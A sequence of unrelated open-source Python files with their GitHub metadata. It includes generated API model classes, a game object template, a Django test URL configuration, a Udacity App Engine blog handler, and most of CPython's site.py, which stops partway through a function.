            "_configuration",
            "_composed_instances",
            "_var_name_to_model_instances",
            "_additional_properties_model_instances",
        ]
    )

    def __init__(
        self,
        _check_type=True,
        _from_server=False,
        _path_to_item=(),
        _configuration=None,
        **kwargs
    ):  # noqa: E501
        """bt_parameter_spec_array2600.BTParameterSpecArray2600 - a model defined in OpenAPI

        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                will be type checked and a TypeError will be
                raised if the wrong type is input.
                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                drill down to the model in received_data
                when deserializing a response
            _from_server (bool): True if the data is from the server
                False if the data is from the client (default)
            _configuration (Configuration): the instance to use when
                deserializing a file_type parameter.
                If passed, type conversion is attempted
                If omitted no type conversion is done.
            bt_type (str): [optional]  # noqa: E501
            driven_query (str): [optional]  # noqa: E501
            item_label_template (str): [optional]  # noqa: E501
            item_name (str): [optional]  # noqa: E501
            additional_localized_strings (int): [optional]  # noqa: E501
            column_name (str): [optional]  # noqa: E501
            default_value (btm_parameter1.BTMParameter1): [optional]  # noqa: E501
            icon_uri (str): [optional]  # noqa: E501
            localizable_name (str): [optional]  # noqa: E501
            localized_name (str): [optional]  # noqa: E501
            parameter_id (str): [optional]  # noqa: E501
            parameter_name (str): [optional]  # noqa: E501
            strings_to_localize ([str]): [optional]  # noqa: E501
            ui_hint (str): [optional]  # noqa: E501
            ui_hints ([str]): [optional]  # noqa: E501
            visibility_condition (bt_parameter_visibility_condition177.BTParameterVisibilityCondition177): [optional]  # noqa: E501
        """
        self._data_store = {}
        self._check_type = _check_type
        self._from_server = _from_server
        self._path_to_item = _path_to_item
        self._configuration = _configuration

        constant_args = {
            "_check_type": _check_type,
            "_path_to_item": _path_to_item,
            "_from_server": _from_server,
            "_configuration": _configuration,
        }
        # This model has no required (constructor-enforced) properties.
        required_args = {}
        # remove args whose value is Null because they are unset
        required_arg_names = list(required_args.keys())
        for required_arg_name in required_arg_names:
            if required_args[required_arg_name] is nulltype.Null:
                del required_args[required_arg_name]
        model_args = {}
        model_args.update(required_args)
        model_args.update(kwargs)
        # Distribute the keyword args across the composed (allOf) instances.
        composed_info = validate_get_composed_info(constant_args, model_args, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        unused_args = composed_info[3]

        for var_name, var_value in required_args.items():
            setattr(self, var_name, var_value)
        for var_name, var_value in six.iteritems(kwargs):
            if (
                var_name in unused_args
                and self._configuration is not None
                and self._configuration.discard_unknown_keys
                and not self._additional_properties_model_instances
            ):
                # discard variable.
                continue
            setattr(self, var_name, var_value)

    @staticmethod
    def _composed_schemas():
        # we need this here to make our import statements work
        # we must store _composed_schemas in here so the code is only run
        # when we invoke this method. If we kept this at the class
        # level we would get an error beause the class level
        # code would be run when this module is imported, and these composed
        # classes don't exist yet because their module has not finished
        # loading
        return {
            "anyOf": [],
            "allOf": [
                bt_parameter_spec6.BTParameterSpec6,
                bt_parameter_spec_array2600_all_of.BTParameterSpecArray2600AllOf,
            ],
            "oneOf": [],
        }
|
{
"content_hash": "ca5d6f6231f15e5a774a73779ba1148f",
"timestamp": "",
"source": "github",
"line_count": 278,
"max_line_length": 131,
"avg_line_length": 41.201438848920866,
"alnum_prop": 0.5856469355683604,
"repo_name": "onshape-public/onshape-clients",
"id": "af0344b122cb8e3502337335954e1e9bcd2cf3e7",
"size": "11471",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/onshape_client/oas/models/bt_parameter_spec_array2600.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4873"
},
{
"name": "Go",
"bytes": "59674"
},
{
"name": "HTML",
"bytes": "3851790"
},
{
"name": "JavaScript",
"bytes": "2217"
},
{
"name": "Makefile",
"bytes": "559"
},
{
"name": "Python",
"bytes": "7560009"
},
{
"name": "Shell",
"bytes": "3475"
},
{
"name": "TypeScript",
"bytes": "1412661"
}
],
"symlink_target": ""
}
|
from swgpy.object import *
def create(kernel):
    """Build the shared Rodian female player-creature template object."""
    creature = Creature()
    creature.template = "object/creature/player/shared_rodian_female.iff"
    creature.attribute_template_id = -1
    creature.stfName("species","rodian")

    #### BEGIN MODIFICATIONS ####
    #### END MODIFICATIONS ####

    return creature
|
{
"content_hash": "1858f715be078a24e4ce2b1350e3c968",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 68,
"avg_line_length": 22.53846153846154,
"alnum_prop": 0.6928327645051194,
"repo_name": "obi-two/Rebelion",
"id": "fab67f073b8e9ac3da97bb510f3bcf798c9aced0",
"size": "438",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/creature/player/shared_rodian_female.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
}
|
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class SetSharedLinkAccessRightsResponse:
    """Response wrapper for the SetSharedLinkAccessRights API call.

    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually."""

    def __init__(self):
        # Maps attribute names to their swagger type strings, used by the
        # client's deserializer.
        self.swaggerTypes = {
            'result': 'SetSharedLinkAccessRightsResult',
            'status': 'str',
            'error_message': 'str',
            'composedOn': 'long',
        }

        self.result = None         # SetSharedLinkAccessRightsResult
        self.status = None         # str
        self.error_message = None  # str
        self.composedOn = None     # long
|
{
"content_hash": "d436eb7eeaf11c0a7b60e2a75b084345",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 77,
"avg_line_length": 31.64864864864865,
"alnum_prop": 0.6575576430401366,
"repo_name": "liosha2007/temporary-groupdocs-python-sdk",
"id": "eabb0a81d0d67c27433fe08ddb1072837c180aeb",
"size": "1193",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "groupdocs/models/SetSharedLinkAccessRightsResponse.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1070081"
}
],
"symlink_target": ""
}
|
""" Manifest Test Settings
"""
# pylint: disable=invalid-name
from django.shortcuts import render
from django.urls import include, path, re_path
from django.views.generic import TemplateView
from rest_framework_jwt.views import (
obtain_jwt_token,
refresh_jwt_token,
verify_jwt_token,
)
from manifest import views
from manifest.forms import RegisterFormToS
# Shared fixtures for the URL-override test routes declared below.
TEST_SUCCESS_URL = "/test/"
TEST_REGISTER_FORM_CLASS = RegisterFormToS
def handler404(request, exception=Exception("Page not found!")):
    """Render the custom 404 page (the `exception` default matches Django's handler signature)."""
    return render(request, "404.html", status=404)
def handler500(request):
    """Render the custom 500 (server error) page."""
    return render(request, "500.html", status=500)
# URL configuration used only by the test suite: real app includes plus a set
# of routes that override view attributes (success_url, form_class, email
# templates) so individual behaviors can be exercised.
urlpatterns = [
    # fmt: off
    # App, API, and flatpage includes.
    path("accounts/", include("manifest.urls")),
    path("manifest/", include("manifest.endpoints")),
    path("flatpages/", include("django.contrib.flatpages.urls")),
    # JWT auth endpoints.
    path("jwt/obtain/", obtain_jwt_token),
    path("jwt/refresh/", refresh_jwt_token),
    path("jwt/verify/", verify_jwt_token),
    # Paginated user list (one user per page, to make pagination testable).
    re_path(
        r"^users/(?P<page>\d+)$",
        views.UserListView.as_view(paginate_by=1),
        name="user_list_paginated"),
    # Test-only routes overriding success_url on the auth views.
    re_path(
        r'^test-auth-login-success-url/$',
        views.AuthLoginView.as_view(success_url=TEST_SUCCESS_URL),
        name='test_auth_login_success_url',
    ),
    re_path(
        r'^test-auth-register-success-url/$',
        views.AuthRegisterView.as_view(success_url=TEST_SUCCESS_URL),
        name='test_auth_register_success_url',
    ),
    re_path(
        r'^test-auth-register-form-class/$',
        views.AuthRegisterView.as_view(form_class=TEST_REGISTER_FORM_CLASS),
        name='test_auth_register_form_class',
    ),
    re_path(
        r'^test-auth-activate-success-url/(?P<username>\w+)/(?P<token>\w+)/$',
        views.AuthActivateView.as_view(success_url=TEST_SUCCESS_URL),
        name='test_auth_activate_success_url',
    ),
    re_path(
        r'^test-profile-update-success-url/$',
        views.ProfileUpdateView.as_view(success_url=TEST_SUCCESS_URL),
        name='test_profile_update_success_url',
    ),
    re_path(
        r'^test-email-change-success-url/$',
        views.EmailChangeView.as_view(success_url=TEST_SUCCESS_URL),
        name='test_email_change_success_url',
    ),
    re_path(
        r'^test-email-change-confirm-success-url/'
        r'(?P<username>\w+)/(?P<token>\w+)/$',
        views.EmailChangeConfirmView.as_view(success_url=TEST_SUCCESS_URL),
        name='test_email_change_confirm_success_url',
    ),
    re_path(
        r'^test-password-change-success-url/$',
        views.PasswordChangeView.as_view(success_url=TEST_SUCCESS_URL),
        name='test_password_change_success_url',
    ),
    # Routes that blank out individual email templates to exercise the
    # SendMail mixin's error paths.
    re_path(
        r'^test-send-mail-mixin-subject/$',
        views.EmailChangeView.as_view(
            email_subject_template_name_new=None
        ),
        name='test_send_mail_mixin_subject',
    ),
    re_path(
        r'^test-send-mail-mixin-message/$',
        views.EmailChangeView.as_view(
            email_message_template_name_new=None
        ),
        name='test_send_mail_mixin_message',
    ),
    re_path(
        r'^test-send-mail-mixin-html/$',
        views.EmailChangeView.as_view(
            email_html_template_name_new=""
            'manifest/emails/confirmation_email_message_new.txt'
        ),
        name='test_send_mail_mixin_html',
    ),
    # Direct routes to the custom error handlers so they can be hit in tests.
    re_path(
        r'^404$',
        handler404,
        name='page_not_found',
    ),
    re_path(
        r'^500$',
        handler500,
        name='server_error',
    ),
    # Homepage, then a catch-all that serves the Vue single-page app for
    # anything that is not media/static/flatpages.
    re_path(
        "^$",
        TemplateView.as_view(template_name="homepage.html"), name="homepage"),
    re_path(
        "^(?!media|static|flatpages)",
        TemplateView.as_view(template_name="vue.html"),
        name="vue",
    ),
    # fmt: on
]
|
{
"content_hash": "728ae75f39f50f2d195eda6681ddcb7a",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 78,
"avg_line_length": 28.30597014925373,
"alnum_prop": 0.6111257579752175,
"repo_name": "ozgurgunes/django-manifest",
"id": "7107c00805a887518f9f987129d124b45d9e90c2",
"size": "3817",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3085"
},
{
"name": "HTML",
"bytes": "33852"
},
{
"name": "JavaScript",
"bytes": "113339"
},
{
"name": "Python",
"bytes": "132152"
}
],
"symlink_target": ""
}
|
'''
Created on Apr 30, 2012
@author: h87966
Homework 3 - Basic blog
In order to be graded correctly for this homework, there are a
few things to keep in mind. We'll be grading your web app by
POSTing new blog entries to your form and checking that they
appear on your blog's front page. There are a few main issues
you need to keep in mind in order for this to work:
1. We assume your form to create new blog entries is at a path of
'/newpost' from your blog's front page. That is, if your blog's
front page is at 'www.myblog.com/blog', then the form is at
'www.myblog.com/blog/newpost'.
2. The form method must be POST, not GET.
3. The form input boxes must have the names 'subject' and 'content'
in order for the grading script to correctly post to them.
4. You must enter the full url into the supplied textbox above,
including the path to your blog's front page. For example,
our example app is running at http://cs253-homework-sean.appspot.com/blog,
but if we instead only entered http://udacity-cs253.appspot.com/ then
the grading script would not work.
5. Don't forget to escape your output!
My Notes from video:
1. Front page will list entries
2. A Form page to submit entries with a 'subject' and 'content' input
fields. Both fields are required and need to be validated with messages
3. Permalink page for each entry that has a unique url
Udacity basic blog app URL:
http://cs253-homework-sean.appspot.com/blog
My basic blog URL:
http://cdoremus-udacity-cs253/unit3/blog
'''
import webapp2
import os
from google.appengine.ext.webapp import template
from unit3.blog_service import BlogService
from unit3.blog_entry import BlogData
from unit3.blog_datastore_factory import BlogDataStoreFactory
class BlogFrontPage(webapp2.RequestHandler):
    """Front page controller for Homework 3 - Basic Blog: lists all entries."""

    def get(self):
        """Render the blog front page with every stored entry."""
        self.response.headers['Content-Type'] = 'text/html'
        entries = BlogService(BlogDataStoreFactory()).fetchAll()
        template_path = os.path.join(os.path.dirname(__file__), 'blog.html')
        self.response.out.write(
            template.render(template_path, {'blog_entries': entries}))
class CreateBlogEntryPage(webapp2.RequestHandler):
    """Renders the form used to compose a new blog entry."""

    def get(self):
        """Show the entry form, pre-filled from any query parameters."""
        self.response.headers['Content-Type'] = 'text/html'
        values = {
            'subject': self.request.get('subject'),
            'content': self.request.get('content'),
        }
        template_path = os.path.join(
            os.path.dirname(__file__), 'create_blog_entry.html')
        self.response.out.write(template.render(template_path, values))
class SaveBlogEntry(webapp2.RequestHandler):
    """Validates and persists a submitted blog entry."""

    def post(self):
        """Save the entry if both fields are present; otherwise re-render the
        form with per-field error messages and the submitted values."""
        self.response.headers['Content-Type'] = 'text/html'
        subject = self.request.get('subject')
        content = self.request.get('content')

        values = {}
        if not subject:
            values['subject_error'] = 'Blog subject is required'
        if not content:
            values['content_error'] = 'Blog content is required'

        if values:
            # Validation failed: redisplay the form with errors and input.
            values['subject'] = subject
            values['content'] = content
            template_file = 'create_blog_entry.html'
        else:
            service = BlogService(BlogDataStoreFactory())
            service.save(BlogData(subject=subject, content=content))
            values['blog_entries'] = service.fetchAll()
            template_file = 'blog.html'

        path = os.path.join(os.path.dirname(__file__), template_file)
        self.response.out.write(template.render(path, values))
class ShowBlogEntry(webapp2.RequestHandler):
    """Permalink page: displays a single blog entry by its id."""

    def get(self):
        """Fetch the entry named by the 'entry_id' parameter and render it."""
        self.response.headers['Content-Type'] = 'text/html'
        service = BlogService(BlogDataStoreFactory())
        entry = service.fetch(int(self.request.get('entry_id')))
        template_path = os.path.join(
            os.path.dirname(__file__), 'show_blog_entry.html')
        self.response.out.write(template.render(
            template_path, {'subject': entry.subject, 'content': entry.content}))
|
{
"content_hash": "8a39c27934dc152c6654fb700bdb8abd",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 84,
"avg_line_length": 36.422764227642276,
"alnum_prop": 0.6591517857142857,
"repo_name": "cdoremus/udacity-python_web_development-cs253",
"id": "9d42bf458895f3a5ac5acad6822fa006f9e2d7f2",
"size": "4480",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/unit3/blog_main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "15273"
},
{
"name": "Python",
"bytes": "233912"
}
],
"symlink_target": ""
}
|
"""Append module search paths for third-party packages to sys.path.
****************************************************************
* This module is automatically imported during initialization. *
****************************************************************
This will append site-specific paths to the module search path. On
Unix (including Mac OSX), it starts with sys.prefix and
sys.exec_prefix (if different) and appends
lib/python<version>/site-packages.
On other platforms (such as Windows), it tries each of the
prefixes directly, as well as with lib/site-packages appended. The
resulting directories, if they exist, are appended to sys.path, and
also inspected for path configuration files.
If a file named "pyvenv.cfg" exists one directory above sys.executable,
sys.prefix and sys.exec_prefix are set to that directory and
it is also checked for site-packages (sys.base_prefix and
sys.base_exec_prefix will always be the "real" prefixes of the Python
installation). If "pyvenv.cfg" (a bootstrap configuration file) contains
the key "include-system-site-packages" set to anything other than "false"
(case-insensitive), the system-level prefixes will still also be
searched for site-packages; otherwise they won't.
All of the resulting site-specific directories, if they exist, are
appended to sys.path, and also inspected for path configuration
files.
A path configuration file is a file whose name has the form
<package>.pth; its contents are additional directories (one per line)
to be added to sys.path. Non-existing directories (or
non-directories) are never added to sys.path; no directory is added to
sys.path more than once. Blank lines and lines beginning with
'#' are skipped. Lines starting with 'import' are executed.
For example, suppose sys.prefix and sys.exec_prefix are set to
/usr/local and there is a directory /usr/local/lib/python2.5/site-packages
with three subdirectories, foo, bar and spam, and two path
configuration files, foo.pth and bar.pth. Assume foo.pth contains the
following:
# foo package configuration
foo
bar
bletch
and bar.pth contains:
# bar package configuration
bar
Then the following directories are added to sys.path, in this order:
/usr/local/lib/python2.5/site-packages/bar
/usr/local/lib/python2.5/site-packages/foo
Note that bletch is omitted because it doesn't exist; bar precedes foo
because bar.pth comes alphabetically before foo.pth; and spam is
omitted because it is not mentioned in either path configuration file.
The readline module is also automatically configured to enable
completion for systems that support it. This can be overridden in
sitecustomize, usercustomize or PYTHONSTARTUP. Starting Python in
isolated mode (-I) disables automatic readline configuration.
After these operations, an attempt is made to import a module
named sitecustomize, which can perform arbitrary additional
site-specific customizations. If this import fails with an
ImportError exception, it is silently ignored.
"""
import sys
import os
import builtins
import _sitebuiltins
# Prefixes for site-packages; add additional prefixes like /usr/local here
PREFIXES = [sys.prefix, sys.exec_prefix]
# Enable per user site-packages directory
# set it to False to disable the feature or True to force the feature
# (None means "not decided yet": main() resolves it via check_enableusersite())
ENABLE_USER_SITE = None

# for distutils.commands.install
# These values are initialized by the getuserbase() and getusersitepackages()
# functions, through the main() function when Python starts.
USER_SITE = None
USER_BASE = None
def makepath(*paths):
    """Join *paths*, absolutize when possible, and return the pair
    ``(dir, os.path.normcase(dir))`` used for case-insensitive dedup."""
    joined = os.path.join(*paths)
    try:
        joined = os.path.abspath(joined)
    except OSError:
        # abspath can fail (e.g. getcwd() on a removed directory);
        # fall back to the unresolved join.
        pass
    return joined, os.path.normcase(joined)
def abs_paths():
    """Set all module __file__ and __cached__ attributes to an absolute path"""
    for m in set(sys.modules.values()):
        # Only touch modules imported by the frozen importlib machinery.
        if (getattr(getattr(m, '__loader__', None), '__module__', None) not in
                ('_frozen_importlib', '_frozen_importlib_external')):
            continue   # don't mess with a PEP 302-supplied __file__
        try:
            m.__file__ = os.path.abspath(m.__file__)
        except (AttributeError, OSError, TypeError):
            # Modules without __file__, or with odd values, are skipped.
            pass
        try:
            m.__cached__ = os.path.abspath(m.__cached__)
        except (AttributeError, OSError, TypeError):
            pass
def removeduppaths():
    """ Remove duplicate entries from sys.path along with making them
    absolute"""
    # This ensures that the initial path provided by the interpreter contains
    # only absolute pathnames, even if we're running from the build directory.
    L = []
    known_paths = set()
    for dir in sys.path:
        # Filter out duplicate paths (on case-insensitive file systems also
        # if they only differ in case); turn relative paths into absolute
        # paths.
        dir, dircase = makepath(dir)
        if dircase not in known_paths:
            L.append(dir)
            known_paths.add(dircase)
    # Replace the contents in place so other references to sys.path see it.
    sys.path[:] = L
    return known_paths
def _init_pathinfo():
    """Return a set containing all existing file system items from sys.path."""
    existing = set()
    for entry in sys.path:
        try:
            if os.path.exists(entry):
                # Store the normcased form so later membership tests match
                # makepath()'s dedup key.
                existing.add(makepath(entry)[1])
        except TypeError:
            # Non-string sys.path entries are simply skipped.
            continue
    return existing
def addpackage(sitedir, name, known_paths):
    """Process a .pth file within the site-packages directory:
    For each line in the file, either combine it with sitedir to a path
    and add that to known_paths, or execute it if it starts with 'import '.
    """
    if known_paths is None:
        known_paths = _init_pathinfo()
        reset = True
    else:
        reset = False
    fullname = os.path.join(sitedir, name)
    try:
        f = open(fullname, "r")
    except OSError:
        # Unreadable .pth files are silently ignored.
        return
    with f:
        for n, line in enumerate(f):
            if line.startswith("#"):
                # Comment line.
                continue
            try:
                if line.startswith(("import ", "import\t")):
                    # Executable .pth line (trusted by convention);
                    # run it verbatim.
                    exec(line)
                    continue
                line = line.rstrip()
                dir, dircase = makepath(sitedir, line)
                if not dircase in known_paths and os.path.exists(dir):
                    sys.path.append(dir)
                    known_paths.add(dircase)
            except Exception:
                # Report the offending line with a traceback, then abandon
                # the rest of this .pth file.
                print("Error processing line {:d} of {}:\n".format(n+1, fullname),
                      file=sys.stderr)
                import traceback
                for record in traceback.format_exception(*sys.exc_info()):
                    for line in record.splitlines():
                        print(' '+line, file=sys.stderr)
                print("\nRemainder of file ignored", file=sys.stderr)
                break
    if reset:
        # We created known_paths locally; don't leak it to the caller.
        known_paths = None
    return known_paths
def addsitedir(sitedir, known_paths=None):
    """Add 'sitedir' argument to sys.path if missing and handle .pth files in
    'sitedir'"""
    if known_paths is None:
        known_paths = _init_pathinfo()
        reset = True
    else:
        reset = False
    sitedir, sitedircase = makepath(sitedir)
    if not sitedircase in known_paths:
        sys.path.append(sitedir)        # Add path component
        known_paths.add(sitedircase)
    try:
        names = os.listdir(sitedir)
    except OSError:
        # Missing/unreadable directory: nothing to process.
        return
    # Process .pth files in deterministic (sorted) order.
    names = [name for name in names if name.endswith(".pth")]
    for name in sorted(names):
        addpackage(sitedir, name, known_paths)
    if reset:
        known_paths = None
    return known_paths
def check_enableusersite():
    """Check if user site directory is safe for inclusion

    The function tests for the command line flag (including environment var),
    process uid/gid equal to effective uid/gid.

    None: Disabled for security reasons
    False: Disabled by user (command line option)
    True: Safe and enabled
    """
    if sys.flags.no_user_site:
        return False

    # Refuse the user site directory when running with elevated effective
    # ids (setuid/setgid-like situations).
    has_uid_api = hasattr(os, "getuid") and hasattr(os, "geteuid")
    if has_uid_api and os.geteuid() != os.getuid():
        return None

    has_gid_api = hasattr(os, "getgid") and hasattr(os, "getegid")
    if has_gid_api and os.getegid() != os.getgid():
        return None

    return True
# NOTE: sysconfig and it's dependencies are relatively large but site module
# needs very limited part of them.
# To speedup startup time, we have copy of them.
#
# See https://bugs.python.org/issue29585
# Copy of sysconfig._getuserbase()
def _getuserbase():
env_base = os.environ.get("PYTHONUSERBASE", None)
if env_base:
return env_base
def joinuser(*args):
return os.path.expanduser(os.path.join(*args))
if os.name == "nt":
base = os.environ.get("APPDATA") or "~"
return joinuser(base, "Python")
if sys.platform == "darwin" and sys._framework:
return joinuser("~", "Library", sys._framework,
"%d.%d" % sys.version_info[:2])
return joinuser("~", ".local")
# Same to sysconfig.get_path('purelib', os.name+'_user')
def _get_path(userbase):
version = sys.version_info
if os.name == 'nt':
return f'{userbase}\\Python{version[0]}{version[1]}\\site-packages'
if sys.platform == 'darwin' and sys._framework:
return f'{userbase}/lib/python/site-packages'
return f'{userbase}/lib/python{version[0]}.{version[1]}/site-packages'
def getuserbase():
    """Returns the `user base` directory path.

    The `user base` directory can be used to store data. If the global
    variable ``USER_BASE`` is not initialized yet, this function will also
    set it.
    """
    global USER_BASE
    if USER_BASE is not None:
        return USER_BASE
    USER_BASE = _getuserbase()
    return USER_BASE
def getusersitepackages():
    """Returns the user-specific site-packages directory path.

    If the global variable ``USER_SITE`` is not initialized yet, this
    function will also set it.
    """
    global USER_SITE
    base_dir = getuserbase()  # side effect: also initializes USER_BASE
    if USER_SITE is None:
        USER_SITE = _get_path(base_dir)
    return USER_SITE
def addusersitepackages(known_paths):
    """Add a per user site-package to sys.path

    Each user has its own python directory with site-packages in the
    home directory.
    """
    # get the per user site-package path
    # this call will also make sure USER_BASE and USER_SITE are set
    user_site = getusersitepackages()

    # Only added when the feature is enabled and the directory exists.
    if ENABLE_USER_SITE and os.path.isdir(user_site):
        addsitedir(user_site, known_paths)
    return known_paths
def getsitepackages(prefixes=None):
    """Returns a list containing all global site-packages directories.

    For each directory present in ``prefixes`` (or the global ``PREFIXES``),
    this function will find its `site-packages` subdirectory depending on the
    system environment, and will return a list of full paths.
    """
    if prefixes is None:
        prefixes = PREFIXES
    sitepackages = []
    seen = set()
    for prefix in prefixes:
        # Skip empty entries and prefixes already handled.
        if not prefix or prefix in seen:
            continue
        seen.add(prefix)
        if os.sep == '/':
            # Unix layout: <prefix>/lib/pythonX.Y/site-packages
            sitepackages.append(
                os.path.join(prefix, "lib",
                             "python%d.%d" % sys.version_info[:2],
                             "site-packages"))
        else:
            # Other platforms (e.g. Windows): the prefix itself plus
            # <prefix>/lib/site-packages
            sitepackages.append(prefix)
            sitepackages.append(os.path.join(prefix, "lib", "site-packages"))
    return sitepackages
def addsitepackages(known_paths, prefixes=None):
    """Add site-packages to sys.path"""
    # Each existing site-packages dir is appended and its .pth files run.
    for sitedir in getsitepackages(prefixes):
        if os.path.isdir(sitedir):
            addsitedir(sitedir, known_paths)
    return known_paths
def setquit():
    """Define new builtins 'quit' and 'exit'.

    These are objects which make the interpreter exit when called.
    The repr of each object contains a hint at how it works.
    """
    # Pick the platform's EOF key combination for the hint text.
    if os.sep == '\\':
        eof = 'Ctrl-Z plus Return'
    else:
        eof = 'Ctrl-D (i.e. EOF)'

    builtins.quit = _sitebuiltins.Quitter('quit', eof)
    builtins.exit = _sitebuiltins.Quitter('exit', eof)
def setcopyright():
    """Set 'copyright' and 'credits' in builtins"""
    builtins.copyright = _sitebuiltins._Printer("copyright", sys.copyright)
    if sys.platform[:4] == 'java':
        builtins.credits = _sitebuiltins._Printer(
            "credits",
            "Jython is maintained by the Jython developers (www.jython.org).")
    else:
        builtins.credits = _sitebuiltins._Printer("credits", """\
    Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands
    for supporting Python development. See www.python.org for more information.""")
    files, dirs = [], []
    # Not all modules are required to have a __file__ attribute. See
    # PEP 420 for more details.
    if hasattr(os, '__file__'):
        # Look for the license file next to the standard library.
        here = os.path.dirname(os.__file__)
        files.extend(["LICENSE.txt", "LICENSE"])
        dirs.extend([os.path.join(here, os.pardir), here, os.curdir])
    builtins.license = _sitebuiltins._Printer(
        "license",
        "See https://www.python.org/psf/license/",
        files, dirs)
def sethelper():
    """Install the interactive 'help' object in builtins."""
    builtins.help = _sitebuiltins._Helper()
def enablerlcompleter():
    """Enable default readline configuration on interactive prompts, by
    registering a sys.__interactivehook__.

    If the readline module can be imported, the hook will set the Tab key
    as completion key and register ~/.python_history as history file.
    This can be overridden in the sitecustomize or usercustomize module,
    or in a PYTHONSTARTUP file.
    """
    def register_readline():
        # Runs lazily, only when an interactive prompt starts.
        import atexit
        try:
            import readline
            import rlcompleter
        except ImportError:
            # No readline support on this build: nothing to configure.
            return

        # Reading the initialization (config) file may not be enough to set a
        # completion key, so we set one first and then read the file.
        readline_doc = getattr(readline, '__doc__', '')
        if readline_doc is not None and 'libedit' in readline_doc:
            # libedit (macOS) uses a different binding syntax.
            readline.parse_and_bind('bind ^I rl_complete')
        else:
            readline.parse_and_bind('tab: complete')

        try:
            readline.read_init_file()
        except OSError:
            # An OSError here could have many causes, but the most likely one
            # is that there's no .inputrc file (or .editrc file in the case of
            # Mac OS X + libedit) in the expected location. In that case, we
            # want to ignore the exception.
            pass

        if readline.get_current_history_length() == 0:
            # If no history was loaded, default to .python_history.
            # The guard is necessary to avoid doubling history size at
            # each interpreter exit when readline was already configured
            # through a PYTHONSTARTUP hook, see:
            # http://bugs.python.org/issue5845#msg198636
            history = os.path.join(os.path.expanduser('~'),
                                   '.python_history')
            try:
                readline.read_history_file(history)
            except OSError:
                pass

            def write_history():
                try:
                    readline.write_history_file(history)
                except (FileNotFoundError, PermissionError):
                    # home directory does not exist or is not writable
                    # https://bugs.python.org/issue19891
                    pass

            atexit.register(write_history)

    sys.__interactivehook__ = register_readline
def venv(known_paths):
    """Detect a virtual environment (pyvenv.cfg) and adjust sys.prefix,
    sys.exec_prefix and PREFIXES accordingly.

    Returns *known_paths*, possibly extended with the venv's site-packages.
    """
    global PREFIXES, ENABLE_USER_SITE

    env = os.environ
    if sys.platform == 'darwin' and '__PYVENV_LAUNCHER__' in env:
        # macOS launcher passes the real executable through the environment.
        executable = sys._base_executable = os.environ['__PYVENV_LAUNCHER__']
    elif sys.platform == 'win32' and '__PYVENV_LAUNCHER__' in env:
        executable = sys.executable
        import _winapi
        sys._base_executable = _winapi.GetModuleFileName(0)
        # bpo-35873: Clear the environment variable to avoid it being
        # inherited by child processes.
        del os.environ['__PYVENV_LAUNCHER__']
    else:
        executable = sys.executable
    exe_dir, _ = os.path.split(os.path.abspath(executable))
    site_prefix = os.path.dirname(exe_dir)
    sys._home = None
    conf_basename = 'pyvenv.cfg'
    # pyvenv.cfg may live next to the executable or one directory above it.
    candidate_confs = [
        conffile for conffile in (
            os.path.join(exe_dir, conf_basename),
            os.path.join(site_prefix, conf_basename)
        )
        if os.path.isfile(conffile)
    ]

    if candidate_confs:
        virtual_conf = candidate_confs[0]
        system_site = "true"
        # Issue 25185: Use UTF-8, as that's what the venv module uses when
        # writing the file.
        with open(virtual_conf, encoding='utf-8') as f:
            for line in f:
                if '=' in line:
                    key, _, value = line.partition('=')
                    key = key.strip().lower()
                    value = value.strip()
                    if key == 'include-system-site-packages':
                        system_site = value.lower()
                    elif key == 'home':
                        sys._home = value

        sys.prefix = sys.exec_prefix = site_prefix

        # Doing this here ensures venv takes precedence over user-site
        addsitepackages(known_paths, [sys.prefix])

        # addsitepackages will process site_prefix again if its in PREFIXES,
        # but that's ok; known_paths will prevent anything being added twice
        if system_site == "true":
            PREFIXES.insert(0, sys.prefix)
        else:
            PREFIXES = [sys.prefix]
            ENABLE_USER_SITE = False

    return known_paths
def execsitecustomize():
    """Run custom site specific code, if available."""
    try:
        try:
            import sitecustomize
        except ImportError as exc:
            # Only swallow "sitecustomize itself is missing"; a failing
            # import *inside* sitecustomize is reported below.
            if exc.name != 'sitecustomize':
                raise
    except Exception as err:
        if sys.flags.verbose:
            sys.excepthook(*sys.exc_info())
        else:
            sys.stderr.write(
                "Error in sitecustomize; set PYTHONVERBOSE for traceback:\n"
                "%s: %s\n" %
                (err.__class__.__name__, err))
def execusercustomize():
    """Run custom user specific code, if available."""
    try:
        try:
            import usercustomize
        except ImportError as exc:
            # A missing usercustomize module is normal; anything else
            # (including an ImportError raised from inside it) is reported.
            if exc.name != 'usercustomize':
                raise
    except Exception as err:
        if sys.flags.verbose:
